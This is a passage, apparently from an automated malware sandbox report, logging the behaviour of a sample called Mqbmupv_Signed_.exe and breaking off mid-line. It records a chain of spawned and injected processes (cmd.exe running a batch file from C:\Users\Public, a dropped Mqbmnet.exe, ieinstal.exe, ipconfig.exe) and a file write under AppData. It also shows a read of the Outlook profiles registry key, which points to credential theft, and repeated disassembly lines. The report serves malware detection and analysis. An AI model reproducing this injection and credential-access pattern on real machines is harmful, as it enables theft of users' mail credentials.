        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
        Source: C:\Windows\SysWOW64\ipconfig.exeFile written: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: ipconfig.pdb source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000009.00000002.345112527.0000000003140000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: ieinstal.exe
        Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231AAF8 push 004069CEh; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231A6D4 push 004065C3h; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_04C60BE8 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\u